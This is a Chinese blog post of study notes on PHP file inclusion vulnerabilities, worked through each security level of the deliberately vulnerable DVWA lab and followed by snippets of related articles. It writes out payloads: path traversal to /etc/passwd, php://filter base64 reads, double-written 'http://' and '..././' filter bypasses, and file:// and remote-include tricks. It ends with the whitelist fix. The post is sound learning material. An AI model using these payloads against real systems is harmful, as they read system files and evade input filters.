dvwa php.ini,DVWA-文件包含学习笔记

最新推荐文章于 2023-10-30 17:00:44 发布
最新推荐文章于 2023-10-30 17:00:44 发布
阅读量370 收藏
点赞数
文章标签: dvwa php.ini

DVWA-文件包含学习笔记

一、文件包含与漏洞

文件包含:

开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含。

文件包含漏洞:

开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞。

二、文件包含漏洞用到的函数

require:找不到被包含的文件,报错,并且停止运行脚本。

include:找不到被包含的文件,只会报错,但会继续运行脚本。

require_once:与require类似,区别在于当重复调用同一文件时,程序只调用一次。

include_once:与include类似,区别在于当重复调用同一文件时,程序只调用一次。

三、目录遍历与文件包含的区别

目录遍历是可以读取web目录以外的其他目录,根源在于对路径访问权限设置不严格,针对本系统。

文件包含是利用函数来包含web目录以外的文件,分为本地包含和远程包含。

四、文件包含特征

?page=a.php

?home=b.html

?file=content

检测方法

?file=../../../../etc/passwd

?page=file:///etc/passwd

?home=main.cgi

?page=http://www.a.com/1.php

http://1.1.1.1/../../../../dir/file.txt

五、DVWA练习

1.修改php.ini配置文件开启文件包含功能

allow_url_include = on

58a1489c67ef08a2fe025a7d073fe525.png

将DVWA的级别设置为low

1.分析源码,可以看到没有对page参数做任何过滤

92ed6be828330e9046c179b269dd767d.png

本地文件包含

2.尝试利用文件包含

2.1绝对路径

76339b3a1f7283c311ec8b44d20d096f.png

文件包含时,不管包含的文件是什么类型,都会优先尝试当作php文件执行,如果文件内容有php代码,则会执行php代码并返回代码执行的结果,如果文件内容没有php代码,则把文件内容打印出来

48e425a798167e5e5688e94b7a20732f.png

文件内容没有php代码,把文件内容打印(显示)到浏览器页面

bef7a532527fd1fb76e8eec2a88926c8.png

2.2相对路径

38d926a60d7c09a7ed23c25dd7b30fcc.png

3.使用php封装协议读取和写入php文件

3.1读取文件

php://filter/read=convert.base64-encode/resource=..././..././..././..././1.txt 访问,可以看到显示了base64编码的内容

c15eb0351aaee7dcc7a387e8b8257ee6.png

使用burpsuit的decode模块解码

796a8b26afb85cae7ba0a18231c4a9b7.png

3.2写入php文件,下图可以看到输入的内容并返回结果

f9d8e27358f2604618d1d11b2407266e.png

远程文件包含

1.通过http协议包含本地服务器上的文件

667250ffc149f31883aa46eaafd1b56e.png

2.通过http协议包含远程服务器上的文件

d5ff96e5869836d16677e8ad73625cc5.png

将DVWA的级别设置为medium

1.分析源码,可以看到使用str_replace函数对http://、https://、../ 、..\进行了过滤,但可以通过双写来绕过,或者使用绝对路径来绕过

288182d480a76333e2dbaf72b689f634.png

2.尝试绕过

先使用http://192.168.10.130/1.txt 抓包分析,可以看到对http://做了过滤

45e855aef3038f4a6a3bccf97d21d57c.png

使用双写绕过http://的过滤    htthttp://p://192.168.10.144/1.txt

4ce941a019bb54c888452ea78df783c0.png

使用..././..././..././..././..././..././..././ 绕过../的过滤

80262481f969620f4fcfab9d83f0aa32.png

使用绝对路径绕过

0a8771da16313c608a4f6fb2c69a6f23.png

使用file协议绕过

e1a713231de9d7cfd6abc757b2880596.png

将DVWA的级别设置为High

1.分析源码可以看到,如果$file变量中不含有file并且$file不等于include.php,此时服务器才不会去包含文件,两个条件只要不满足其中任意一个,就能达到文件包含的目的,可以是同file协议来绕过

42c857c0bd600de98281e9ec009e5186.png

2.使用file协议绕过

7f5c4db54a81b890a79b080e8e0a3fa2.png

将DVWA的级别设置为Impossible

1.分析源码可以看到,使用白名单,page只能为include.php”、“file1.php”、“file2.php”、“file3.php”之一,只允许包含include.php、file1.php、file2.php、file3.php,不能包含别的文件,彻底杜绝文件包含漏洞

7232d9f463307bda6df83734bf8068e5.png

夜雨穿林
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2.文件包含漏洞之dvwa配置php.ini——小白笔记
qwsn
11-07 2048
0x01: 1.php配置文件: 2.进入到php-5.4.45目录下: 3.打开,php.ini,进行配置 4.重启phpstudy
小皮面板DVWA修改php.ini
最新发布
weixin_63830626的博客
04-02 264
可以在everything里搜或者自己找一下这个文件。改的不是网站根目录下的php.ini。可以看到上面的内容很少而且提示了。这里就是我们要找的了。
在安装和配置DVWA渗透测试环境遇到的报错问题
Che_Che_的博客
10-30 684
我的修改的文件路径是: E:\phpstudy_pro\WWW\DVWA\config,开始我没有设置db_password,里面是空的密码,加上root就好了。注意:这几个参数设置一定要一样。这里提示一下,我使用的是PHPstudy集成环境(mysql,Apache),博主提到的php.in文件。踩了这么多坑,终于成功啦!位置在设置里面,点击php.ini。其他的错误按照博主的改。
php.ini
darkwing的专栏
02-23 1011
[PHP];;;;;;;;;;;;;;;;;;;;  关于这个文件   ;;;;;;;;;;;;;;;;;;;;; 这个文件控制了PHP许多方面的观点。为了让PHP读取这个文件,它必须被命名为; php.iniPHP 将在这些地方依次查找该文件:当前工作目录;环境变量PHPRC; 指明的路径;编译时指定的路径。; 在windows下,编译时的路径是Windows安装目录。; 在命令行
DVWA全系列-文件包含
leriger的博客
09-24 1913
文件包含漏洞属于漏洞,为了减少重复代码的编写,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码;简单来说就是一个文件里面包含另外一个或多个文件。几乎所有脚本语言都会提供文件包含的功能。文件包含的原理PHP中提供了四个文件包含的函数,分别是include()、include_once()、require()和require_once()。这四个函数都可以进行文件包含,但作用并不一样。require:找不到被包含文件时会产生致命错误,并停止脚本。
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
DVWA-master.7z 压缩包
09-14
这个"DVWA-master.7z"压缩包包含了完整的DVWA源代码和其他相关文件,用于在本地环境中搭建一个模拟的脆弱Web应用。 为了正确地使用这个压缩包,首先你需要下载它并使用解压缩工具(如7-Zip)将其解压。解压缩后,你...
php.ini在哪里 微赞_查找php配置文件php.ini所在路径的二种方法
weixin_39524636的博客
12-21 147
通常php.ini的位置在:/etc目录下或/usr/local/lib目录下。如果你还是找不到php.ini或者找到了php.ini修改后不生效(其实是没找对),请使用如下办法:1.新建php文件,写入如下代码echo phpinfo();[code]然后在浏览器访问该页面,搜索php.ini,2.执行,(需要修改php为你自己的路径)[code]/usr/local/php/bin/php -...
php 获取ini文件,如何获取php.ini文件路径?
bobo的博客
03-11 271
我们可以使用PHP中的php_ini_loaded_file()函数来获取php.ini文件的位置路径。有时我们需要获取php.ini文件路径。那么如果你需要获取php配置文件的路径,可以进行如下操作:PHP代码示例如下:print_r(php_ini_loaded_file());输出:D:\wamp\bin\apache\apache2.4.17\bin\php.ini如上所示,我们成功获取到...
DVWA文件包含漏洞练习笔记
m0_63711447的博客
04-28 1620
LOW 1、设置难度等级为low后打开测试环境,依次点击上面的三个php文件,发现url只有参数发生了变化,这个参数便可以进行利用 2、改变参数为一个不存在的文件,出现报错信息,并且爆出了文件的绝对路径 3、读取php.ini文件 (1)用绝对路径构造URL: (2)用相对路径构造URL:读取php.ini文件需要跳转到上两级目录,我们利用../进行上一级目录的跳转 4、远程文件包含dvwa根目录下有一个phpinfo.php文件,可以显示服务端php配置信息,我们利用相.
DVWA——文件包含
小纯的博客
03-21 3149
File Inclusion学习文件包含简介实战:DVWA——文件包含 文件包含简介 一、文件包含简介: 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。 二、文件包含函数: PHP文件包含函数有以下四种:require()、require_on
DVWA-PHP function allow_url_include: Disabled错误
热门推荐
安全菜鸟的学习之旅
07-17 3万+
参考网址:https://stackoverflow.com/questions/34274492/dvwa-setup-php-function-allow-url-include-disabled/34540293 在进行DVWA的配置时出现了PHP function allow_url_include: Disabled错误,错误如下。 系统给的错误提示是这样...
DVWA-1.10全级别教程之File Inclusion(学习笔记
大方子
08-22 1万+
根据原创作者:lonehand进行更改,来自FreeBuf.COM 目前,最新的DVWA已经更新到1.9版本(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版本,且没有针对DVWA high级别的教程,因此萌发了一个撰写新手教程的想法,错误的地方还请大家指正。DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴...
DVWA安装and报错修改
七月_的博客
03-20 4033
 实验环境:被攻击服务器环境:虚拟机03环境   wamp集成环境  DVWA压缩包攻击者环境:本机windows 安装dvwa1. 把下载的dvwa解压之后的文件夹,放在wamp的www目录下2. 修改dvwa下的config中的config.inc.php文件将密码设置为空 将安全级别设置为low   $_DVWA[ ‘default_security_level‘ ] = ‘low‘; 配置...
dvwa中的文件包含攻击
无痕的博客
01-17 1837
文件包含攻击介绍与在dvwa中的演示
DVWA-文件包含漏洞
qq_43660551的博客
03-05 1万+
文件包含:当服务器开启allow_url_include选项时,可以通过某些特性函数如:include() , require() , include_once() , require_once() 利用url去动态地包含文件,若未对文件进行来源审查,就会导致任意文件读取或者任意命令执行。 分类: (1)本地文件包含 (2)远程文件包含:因为开启了PHP配置中的allow_url_fopen选项,服务器允许包含一个远程文件。 一、low 看下服务器端核心代码:page为做任何过滤。
DVWA文件包含
giun的博客
03-09 4981
一、前置知识 1、什么是文件包含 一种代码处理方法,函数如include,require等,参数是文件名。 2、文件包含漏洞 文件名的参数用户可控且过滤不严,被攻击者偷梁换柱 二、尝试low等级 打开文件包含题目会发现以下提示,我们找到php.ini配置文件(一般在安装目录里),把 allow_url_include的值改成on,然后重启phpstudy即可 The PHP function a...
DVWAPHP文件包含漏洞(File Inclusion)
Mi1k7ea
03-08 1万+
文件包含漏洞,简单地说,就是在通过函数包含文件时,由于没有对包含文件名进行有效的过滤处理,被攻击者利用从而导致了包含了Web根目录以外的文件进来,就会导致文件信息的泄露甚至注入了恶意代码。更多的介绍这里就不多说了,直接上正题~ 文件包含漏洞的一般特征如下: ?page=a.php ?home=a.html ?file=content 目录遍历(Directory
linux下dvwa文件远程包含漏洞,DVWA-文件包含漏洞
05-17
DVWA(Damn Vulnerable Web Application)是一个专门用于漏洞测试的Web应用程序,其中包含了一些常见的Web安全漏洞,包括文件包含漏洞。 在DVWA中,文件包含漏洞主要存在于以下两个文件中: 1. /dvwa/...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值